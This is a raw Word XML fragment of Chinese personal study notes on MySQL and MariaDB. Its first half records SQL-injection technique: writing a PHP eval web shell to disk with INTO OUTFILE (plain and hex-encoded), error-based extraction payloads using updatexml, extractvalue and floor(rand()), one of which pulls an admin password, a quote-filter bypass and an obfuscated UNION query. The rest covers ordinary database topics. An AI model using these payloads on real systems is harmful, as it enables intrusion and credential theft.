    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| &lt;?php eval($_POST[ximo]); ?&gt;                               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------------------------------------------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set (0.01 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select  3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e,2 into outfile '/root/Desktop/a.php';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ERROR 1054 (42S22): Unknown column '3c3f706870206576616c28245f504f53545b78696d6f5d293b203f3e' in 'field list'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select '123\'123';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 123'123 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 123'123 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+---------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql&gt; set @a=0x73656C6563742030783343334637303638373032303430363537363631364332</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>38323435463530344635333534354232373633364436343237354432393342334633452066726F6D</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>20787373206C696D6974203120696E746F206F757466696C652027433A2F7368656C6C2E70687027;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Query OK, 0 rows affected (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql&gt; prepare cmd from @a;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Query OK, 0 rows affected (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Statement prepared</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql&gt; execute cmd;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Query OK, 1 row affected (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>上面加密的十六进制是：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>select 0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E from xss limit 1 into outfile 'C:/shell.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>order by</w:t>
      </w:r>
      <w:r>
        <w:t>可以判断字段数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' order by 1;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|    16687 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' order by 1 and '1'='2';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|    16687 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>因为</w:t>
      </w:r>
      <w:r>
        <w:t>and</w:t>
      </w:r>
      <w:r>
        <w:t>会先运算，然后值一定会是</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>或</w:t>
      </w:r>
      <w:r>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [(none)]&gt; select count(*) from jwc.teacher where '1'='1' order by '5'-'1';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| count(*) |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>|    16687 |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>这</w:t>
      </w:r>
      <w:r>
        <w:t>TM</w:t>
      </w:r>
      <w:r>
        <w:t>居然没报错，即使后面</w:t>
      </w:r>
      <w:r>
        <w:t>'5'-'1'</w:t>
      </w:r>
      <w:r>
        <w:t>加上括号。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>对空字段的检测：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [PE_SYSTEM]&gt; select * from pe where isnull(test);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------+------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| post | test |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------+------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| 123  | NULL |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+------+------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1 row in set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MariaDB [PE_SYSTEM]&gt; select * from pe where test='';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>Empty set (0.00 sec)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果字段是</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>型用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> id=''</w:t>
      </w:r>
      <w:r>
        <w:t>可以；如果是</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>型用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ISNULL</w:t>
      </w:r>
      <w:r>
        <w:t>好些</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>不过我记得似乎被建议不要为空，为</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>也好。可能是因为查询起来速度不一样。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>函数：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>MID()</w:t>
      </w:r>
      <w:r>
        <w:t>函数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">SQL MID() </w:t>
      </w:r>
      <w:r>
        <w:t>函数用于得到一个字符串的一部分。这个函数被</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>支持，但不被</w:t>
      </w:r>
      <w:r>
        <w:t>MS SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>Oracle</w:t>
      </w:r>
      <w:r>
        <w:t>支持。在</w:t>
      </w:r>
      <w:r>
        <w:t>SQL Server</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Oracle </w:t>
      </w:r>
      <w:r>
        <w:t>数据库中，我们可以使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL SUBSTRING</w:t>
      </w:r>
      <w:r>
        <w:t>函数或者</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SQL SUBSTR</w:t>
      </w:r>
      <w:r>
        <w:t>函数作为替代。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">MID() </w:t>
      </w:r>
      <w:r>
        <w:t>函数语法为：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:tab/>
        <w:t>SELECT MID(ColumnName, Start [, Length]) FROM TableName</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>asc()</w:t>
      </w:r>
      <w:r>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:t>chr()</w:t>
      </w:r>
      <w:r>
        <w:t>将字符串转为</w:t>
      </w:r>
      <w:r>
        <w:t>asc</w:t>
      </w:r>
      <w:r>
        <w:t>或者转回来。还没有试验过多参数！</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:t>load_file</w:t>
      </w:r>
      <w:r>
        <w:t>读文件时，除了使用</w:t>
      </w:r>
      <w:r>
        <w:t>load_file(‘</w:t>
      </w:r>
      <w:r>
        <w:t>路径</w:t>
      </w:r>
      <w:r>
        <w:t>’)</w:t>
      </w:r>
      <w:r>
        <w:t>，还可以使用</w:t>
      </w:r>
      <w:r>
        <w:t>load_file(char(xx,xx,xx))</w:t>
      </w:r>
      <w:r>
        <w:t>这种方式来绕过对单引号的限制</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>concat()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SELECT CONCAT('FIRST ', 'SECOND');</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| CONCAT('FIRST ', 'SECOND') |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>| FIRST SECOND               |</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>+----------------------------+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">UPDATEXML (XML_document, XPath_string, new_value); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>第一个参数：</w:t>
      </w:r>
      <w:r>
        <w:t>XML_document</w:t>
      </w:r>
      <w:r>
        <w:t>是</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>格式，为</w:t>
      </w:r>
      <w:r>
        <w:t>XML</w:t>
      </w:r>
      <w:r>
        <w:t>文档对象的名称，文中为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Doc </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>第二个参数：</w:t>
      </w:r>
      <w:r>
        <w:t>XPath_string (Xpath</w:t>
      </w:r>
      <w:r>
        <w:t>格式的字符串</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r>
        <w:t>，如果不了解</w:t>
      </w:r>
      <w:r>
        <w:t>Xpath</w:t>
      </w:r>
      <w:r>
        <w:t>语法，可以在网上查找教程。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>第三个参数：</w:t>
      </w:r>
      <w:r>
        <w:t>new_value</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:t>String</w:t>
      </w:r>
      <w:r>
        <w:t>格式，替换查找到的符合条件的数据</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>通过报错来显示，类似的还有</w:t>
      </w:r>
      <w:r>
        <w:t>floor,ExtractValue</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>updatexml</w:t>
      </w:r>
      <w:r>
        <w:t>的最大长度是</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位的，所以有所局限。如果目标超过了</w:t>
      </w:r>
      <w:r>
        <w:t>32</w:t>
      </w:r>
      <w:r>
        <w:t>位不会被显示。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>ExtractValue</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1))); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>floor()</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>利用代码：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t xml:space="preserve">and (select count(*) from (select 1 union   select null union   select  !1)x group by concat((select table_name from information_schema.tables  limit 1),floor(rand(0)*2))); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>利用暴错得知</w:t>
      </w:r>
      <w:r>
        <w:t>version</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>select * from article where id = 1 and (select 1 from  (select count(*),concat((select pass from admin where id  =1),floor(rand(0)*2))x from information_schema.tables group by x)a);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>得知</w:t>
      </w:r>
      <w:r>
        <w:t>select pass from admin where id  =1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>UnIoN/*&amp;a=*/SeLeCT/*&amp;a=*/1,2,3,database()-- -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>database()</w:t>
      </w:r>
      <w:r>
        <w:t>会显示当前数据库名字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>事务：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>mysql</w:t>
      </w:r>
      <w:r>
        <w:t>使用</w:t>
      </w:r>
      <w:r>
        <w:t>InnoDB</w:t>
      </w:r>
      <w:r>
        <w:t>的引擎，那么是自动开启事务的，也就是每一条</w:t>
      </w:r>
      <w:r>
        <w:t>sql</w:t>
      </w:r>
      <w:r>
        <w:t>都是一个事务（除了</w:t>
      </w:r>
      <w:r>
        <w:t>select</w:t>
      </w:r>
      <w:r>
        <w:t>），不然平时的使用不就需要每一条后面都来个</w:t>
      </w:r>
      <w:r>
        <w:t>commit</w:t>
      </w:r>
      <w:r>
        <w:t>了。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>为了能够回滚和原子性处理我们需要</w:t>
      </w:r>
      <w:r>
        <w:t>autocommit</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>最关键的来了，当我们显示地开启一个事务，也就是写了</w:t>
      </w:r>
      <w:r>
        <w:t>begin</w:t>
      </w:r>
      <w:r>
        <w:t>的时候，</w:t>
      </w:r>
      <w:r>
        <w:t>autocommit</w:t>
      </w:r>
      <w:r>
        <w:t>对此事务不构成影响</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>数据类型：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>总结，</w:t>
      </w:r>
      <w:r>
        <w:t>int(M) zerofill</w:t>
      </w:r>
      <w:r>
        <w:t>，加上</w:t>
      </w:r>
      <w:r>
        <w:t>zerofill</w:t>
      </w:r>
      <w:r>
        <w:t>后</w:t>
      </w:r>
      <w:r>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:t>才表现出有点点效果，比如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> int(3) zerofill,</w:t>
      </w:r>
      <w:r>
        <w:t>你插入到数据库里的是</w:t>
      </w:r>
      <w:r>
        <w:t>10,</w:t>
      </w:r>
      <w:r>
        <w:t>则实际插入为</w:t>
      </w:r>
      <w:r>
        <w:t>010,</w:t>
      </w:r>
      <w:r>
        <w:t>也就是在前面补充加了一个</w:t>
      </w:r>
      <w:r>
        <w:t>0.</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>int(3)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>int(10)</w:t>
      </w:r>
      <w:r>
        <w:t>不加</w:t>
      </w:r>
      <w:r>
        <w:t>zerofill,</w:t>
      </w:r>
      <w:r>
        <w:t>则它们没有什么区别</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>默认显示</w:t>
      </w:r>
      <w:r>
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t>位长度，</w:t>
      </w:r>
      <w:r>
        <w:t>int(10)</w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t>int(11)</w:t>
      </w:r>
      <w:r>
        <w:t>只是显示的不同，实际存储都是</w:t>
      </w:r>
      <w:r>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>字节。所以</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>能表示到的只是</w:t>
      </w:r>
      <w:r>
        <w:t>11</w:t>
      </w:r>
      <w:r>
        <w:t>位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果要存下四川大学的</w:t>
      </w:r>
      <w:r>
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>为学号只能</w:t>
      </w:r>
      <w:r>
        <w:t>bigint</w:t>
      </w:r>
      <w:r>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:t>char</w:t>
      </w:r>
      <w:r>
        <w:t>（</w:t>
      </w:r>
      <w:r>
        <w:t>varchar</w:t>
      </w:r>
      <w:r>
        <w:t>）。字符串类型的话有个好处就是可以借助一部分内容来进行搜索，</w:t>
      </w:r>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t>的话通过比较来做到所搜功能还是有限的。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果像</w:t>
      </w:r>
      <w:r>
        <w:t>Mariadb</w:t>
      </w:r>
      <w:r>
        <w:t>数据库中存储超出范围的内容那么就会为范围的最小值或者最大值。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>当主机填写为</w:t>
      </w:r>
      <w:r>
        <w:t>localhost</w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>会采用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> unix domain socket</w:t>
      </w:r>
      <w:r>
        <w:t>连接，当主机填写为</w:t>
      </w:r>
      <w:r>
        <w:t>127.0.0.1</w:t>
      </w:r>
      <w:r>
        <w:t>时</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>会采用</w:t>
      </w:r>
      <w:r>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:t>的方式连接。使用</w:t>
      </w:r>
      <w:r>
        <w:t>Unix socket</w:t>
      </w:r>
      <w:r>
        <w:t>的连接比</w:t>
      </w:r>
      <w:r>
        <w:t>TCP/IP</w:t>
      </w:r>
      <w:r>
        <w:t>的连接更加快速与安全。这是</w:t>
      </w:r>
      <w:r>
        <w:t>MySQL</w:t>
      </w:r>
      <w:r>
        <w:t>连接的特性</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="00523480"/>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>SQlite</w:t>
      </w:r>
      <w:r>
        <w:t>在以下时候选择</w:t>
      </w:r>
      <w:r>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>服务器程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00523480" w:rsidRDefault="005E58C5">
      <w:r>
        <w:t>如果你有许多的客户端程序要通过网络访问一个共享的数据库</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>你应当考虑用一个客户端</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:t>服务器数据库来替代</w:t>
      </w:r>
      <w:r>
        <w:t>SQLite. SQLite</w:t>
      </w:r>
      <w:r>
        <w:t>可以通过网络文件系统工作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>但是因为和大多数网络文件系统都存在延时</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>因此执行效率不会很高</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:t>此外大多数网络文件系统在实现文件逻辑锁的方面都存在着</w:t>
      </w:r>
      <w:r>
        <w:t>bug(</w:t>
      </w:r>
      <w:r>
        <w:t>包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Unix </w:t>
      </w:r>
      <w:r>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">windows). </w:t>
      </w:r>
      <w:r>
        <w:t>如果文件锁没有正常的工作</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>就可能出现在同一时间两个或更多的客户端程序更改同一个数据库的同一部分</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t>从而导致数据库出错</w:t>
      </w:r>
      <w:r>
